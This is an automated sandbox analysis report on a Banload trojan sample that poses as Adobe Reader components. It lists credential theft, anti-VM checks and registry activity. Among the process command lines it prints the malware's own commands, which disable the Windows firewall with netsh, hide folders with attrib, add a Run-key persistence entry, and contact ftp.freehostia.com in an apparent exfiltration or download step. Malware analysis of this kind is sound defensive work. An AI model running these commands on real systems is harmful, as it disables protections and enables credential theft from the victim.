Malware Analysis Report

2024-10-16 03:31

Sample ID: 240827-waltzasfjc
Target: c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118
SHA256: 7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60
Tags: banload collection credential_access discovery downloader dropper evasion persistence privilege_escalation spyware stealer trojan upx
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: 7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60

Threat Level: Known bad

The file c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

Banload

Credentials from Password Stores: Credentials from Web Browsers

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Sets file to hidden

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Reads local data of messenger clients

UPX packed file

Reads user/profile data of local email clients

Adds Run key to start application

Accesses Microsoft Outlook accounts

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Gathers network information

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Modifies registry class

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported: 2024-08-27 17:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-08-27 17:43

Reported: 2024-08-27 17:45

Platform: win7-20240704-en

Max time kernel: 119s

Max time network: 120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"

Signatures

Banload

trojan dropper downloader banload

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\lodhgyuuuf = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\aijw01.bat" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InProcServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6} C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\ = "Microsoft DocProp Inplace Droplist Combo Control" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InProcServer32 C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InProcServer32\ = "%SystemRoot%\\SysWow64\\shell32.dll" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\DllHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1720 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1720 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1720 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1720 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2016 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2236 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2236 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2236 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2236 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 2236 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 2236 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 2236 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 2840 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2840 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2840 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2840 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1276 wrote to memory of 1584 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 1276 wrote to memory of 1584 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 1276 wrote to memory of 1584 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 1276 wrote to memory of 1584 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 1276 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1276 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1276 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1276 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1276 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1276 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1276 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1276 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1276 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1276 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1276 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1276 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2108 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2108 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2108 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2108 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lodhgyuuuf" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /all

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

adbr01.exe -f "011.011"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

adbr01.exe -f "011.011"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe

adbr02.exe -f "112.112"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe

adbr02.exe -f "112.112"

C:\Windows\SysWOW64\netsh.exe

netsh firewall set opmode disable

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set profiles state off

C:\Windows\SysWOW64\netsh.exe

NetSh Advfirewall set allprofiles state off

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -a -c -d -natpasv -s:870.afr ftp.freehostia.com

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -a -c -d -natpasv -s:sun.afr ftp.freehostia.com

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exe

BReader 5359

Network

Country Destination Domain Proto
US 8.8.8.8:53 ftp.freehostia.com udp
US 198.23.57.8:21 ftp.freehostia.com tcp
US 198.23.57.8:21 ftp.freehostia.com tcp

Files

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr02.ght

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr01.ght

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\870.afr

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\aijw01.bat

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\sun.afr

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\nimiki09.vbs

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol03.bat

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\BReader.exe

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\Adobeta.exe

C:\ProgramData\TEMP\RAIDTest

C:\Users\Admin\AppData\Local\Temp\9F86B0A0.TMP

C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\112.112

C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\011.011

Analysis: behavioral2

Detonation Overview

Submitted: 2024-08-27 17:43

Reported: 2024-08-27 17:45

Platform: win10v2004-20240802-en

Max time kernel: 139s

Max time network: 124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"

Signatures

Banload

trojan dropper downloader banload

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

